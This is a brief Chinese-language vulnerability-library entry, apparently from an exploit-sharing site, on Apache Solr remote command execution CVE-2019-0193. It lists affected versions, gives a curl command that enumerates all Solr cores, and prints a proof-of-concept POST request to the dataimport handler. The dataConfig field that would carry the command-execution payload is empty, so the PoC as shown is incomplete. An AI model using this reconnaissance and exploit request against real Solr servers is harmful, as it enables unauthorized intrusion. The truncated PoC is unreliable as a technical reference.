Apache Solr远程命令执行 CVE-2019-0193-棉花糖会员站

—
title: ‘Apache Solr远程命令执行 CVE-2019-0193’
date: Sat, 29 Aug 2020 11:09:52 +0000
draft: false
tags: [‘白阁-漏洞库’]
—

影响版本 apache solr 5.x-8.2.0,存在config API版本获取所有 core 信息：curl [http://IP/solr/admin/cores](/static/baige/06-中间件框架漏洞/Apache/Apache Solr/http://IP/solr/admin/cores) HTTP协议头：POST /solr//dataimport

POC

“`
POST /solr//dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=&name=dataimport&dataConfig=

“`

![](/static/baige/06-中间件框架漏洞/Apache/Apache Solr/Apache%20Solr%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%20CVE-2019-0193/123.png)

文章版权归作者所有，未经允许请勿转载。

THE END